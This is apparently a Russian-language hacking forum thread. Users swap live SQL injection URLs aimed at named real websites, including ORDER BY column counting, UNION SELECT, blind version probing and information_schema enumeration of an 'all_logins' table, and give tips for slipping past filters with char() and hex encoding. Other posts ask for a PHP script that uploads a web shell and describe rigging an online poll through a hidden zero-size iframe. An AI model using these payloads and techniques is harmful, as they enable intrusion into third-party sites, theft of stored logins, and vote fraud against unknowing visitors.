Code: http://www.nostalgiatv.ru/418/?id=1287+order+by+5+-- Подал число. При попытке сделать Code: http://www.nostalgiatv.ru/418/?id=-1+uion+select+1,2,3,4,5+-- пишет 33Ошибка выполнения запроса на сервере =( Что не так?
Нужен скриптик на пхп Чтобы когда зашол на страницу то заметно заливался шелл на сайт путь до сайта знаю
Ни как не могу реализировать подбор: _http://www.granadocafe.com/index.php?option=com_fireboard&Itemid=209'
2 wildshaman слепая Code: http://www.nostalgiatv.ru/418/?id=22+and+ascii(lower(substring((version()),1,1)))=52--+ 4 версия на слово "select" походу фильтр идет ;/
Может быть это не совсем по теме, но новый топик создавать не хочется, дабы не засорять форум пустяковым вопросом ламера. Так вот. На определённом сайтике есть опрос, где нужно "продвинуть" один из вариантов ответа. Так как голосовать на сайте можно из инета (всмысле из всего инета, а не из сетки), но так как с одного адреса (скорее всего IP) многоразовое голосование блокируется, то идея вобщем баяновская: создать страничку в сети не по теме, где во фрейме нулевого размера шла бы переадресация на этот опрос с нужным вариантом ответа (типа чел там ответил). Но вот проблема заключается в том, что я не знаю как этот вариант ответа передаётся. Как это можно выяснить?
firefox - tamper data,http fox, и множество сниферов, выберай сам, но имхо легче и быстрее через прокси крутить.
Можно сформировать просто страничку которая будет передовать пораметры голосования POST или GET, ты можешь это посмотреть на форме голосования какая переменная передаются какому скрипту и каким методом, а потом на сформированую страничку просто лей трафик и всё...
AkyHa_MaTaTa>> ну ти прав на що того что кавычки слешыруюца.. но насколько помню есть обход.. я вот только прызабыл где то я ето видел вот и выклал скуль чтоб ктото может поможет).
1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20information_schema.columns%20WHERE%20TABLE_NAME='all_logins')-- 1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20information_schema.columns%20WHERE%20TABLE_NAME=char(97)+char(108)+char(108)+char(95)+char(108)+char(111)+char(103)+char(105)+char(110)+char(115))-- как решить?)
2 Micr0b: есть, например %27, но тогда нет ошибки mysql, т.е. ошибку можно вызвать только когда кавычка в чистом виде, нет ошибки - нет скули ЗЫЖ По идее
2Pashkela если ты это мне то 1+or+1=@@version выводит вывел все таблицы а столбцы не получается из за выше написанного( а скуль это внедрение и выполнение sql-кода) а не ошибки выполнение скрипта) зы. вроде правильно)
Чарить надо так: char(97)%2Bchar(108)%2Bchar(108)%2Bchar(95)%2Bchar(108)%2Bchar(111)%2Bchar(103)%2Bchar(105)%2Bchar(110)%2Bchar(115)
Просто + в урле - это пробел, %2B - это + -------- Лудше переводи в число (в твоем случае - 0x616c6c205f6c6f67696e73) - так короче запрос получается
Ты толком можешь объяснить? Через что заливать? Инъекция? Файл_прив включен? Толку с того, что путь знаешь...